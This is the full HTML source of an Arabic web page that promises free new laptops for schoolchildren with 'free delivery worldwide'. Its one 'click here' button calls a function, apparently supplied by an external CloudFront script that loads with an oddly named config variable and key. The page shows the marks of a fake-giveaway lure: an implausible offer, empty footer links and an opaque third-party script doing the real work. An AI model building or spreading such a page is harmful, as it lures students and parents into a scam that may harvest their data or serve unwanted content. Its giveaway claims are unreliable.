

<!DOCTYPE html>
<html dir="rtl" >
<head>
<title>Sharelaps</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
<link href="https://fonts.googleapis.com/css2?family=Readex+Pro&display=swap" rel="stylesheet">

<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">


<script type="text/javascript">
    var jEWZS_IYX_KxSAxc={"it":4227839,"key":"abe1f"};
</script>
<script src="https://d16w9e5gvnj8jg.cloudfront.net/40400a4.js"></script>


<style type="text/css">
body {font-family: 'Readex Pro', sans-serif;font-size:.9rem;}
nav {padding:15px;border-bottom:1px solid #ddd;}
nav img {height:40px;margin:0 7px;}
.images {margin:20px 0;border:1px solid #ddd;border-radius:4px;background:#f9f9f9;}
.images img {width:100%;border-radius:4px;}
.users {display:flex;}
.users img {width:45px;height:45px;border-radius:50%;border:2px solid #f8f8f8;}
.users img:not(:first-child ) {margin-right:-10px;}
.join {display:flex;align-items:center;}
.join .more {padding-right:8px;font-size:.8rem;}
.join .txt {color:#778;}
.submit {all:unset;background:#000;width:100%;color:#fff;border-radius:30px;padding:10px 0;text-align:center;}

.bg {background:#f9f9f9;padding:20px 0;}
.bg .title {font-weight:bold;}
.bg div:not(.title) {margin:7px 0;}
.bg a {text-decoration:none;color:#779;font-size:.8rem;margin:10px;}


.im {width:70px;margin:0 5px;}
h1 {font-size:1.4rem;font-weight:bold;}
h2 {font-size:1.3rem;font-weight:bold;}

</style>
</head>
<body>

<nav class="d-flex justify-content-center" >
	<div><img src="https://i.postimg.cc/wBhKwr8b/b4.png"></div>
	<div><img src="https://i.postimg.cc/3x0QvRLh/b1.png" ></div>
</nav>





<br>

<div class="container-md" >

	<h1>جهاز اللابتوب الجديد</h1>
	<div class="images" >
		<img src="https://i.postimg.cc/nrSNsbBM/lptp.jpg" >
	</div>
	
	<p>سيتم تسليم الحواسيب للتلاميذ تزامنًا مع بداية العام الدراسي، بهدف دعم عملية تعلمهم وتمكينهم من استخدام التكنولوجيا في مسيرتهم التعليمية.</p>
	<p><b>ملاحظة : </b> التوصيل مجاني في جميع أنحاء العالم</p>
	<button onclick="_Pg()" class="submit" >انقر هنا </button>

	<br>
	<br>
	<br>
	<div class="d-flex justify-content-center" >
		<img class="im" src="https://i.postimg.cc/3x0QvRLh/b1.png" >	
		<img class="im" src="https://i.postimg.cc/pTZwHndf/b2.png" >
		<img class="im" src="https://i.postimg.cc/vmRFLsjV/b3.png" >
		<img class="im" src="https://i.postimg.cc/wBhKwr8b/b4.png" >
	</div>
	
	<br>
	<br>

</div>

<div class="bg" >
	<div class="container-md" >
		<div class="title" >شروط الاستخدام</div>
		<div><a href="" >سياية الخصوصية </a></div>
		<div><a href="" >تواصل معنا</a></div>
		<div><a href="" >التوظيف</a></div>
		<div><a href="" >المنتديات</a></div>
		
	</div>
</div>

</body>
</html>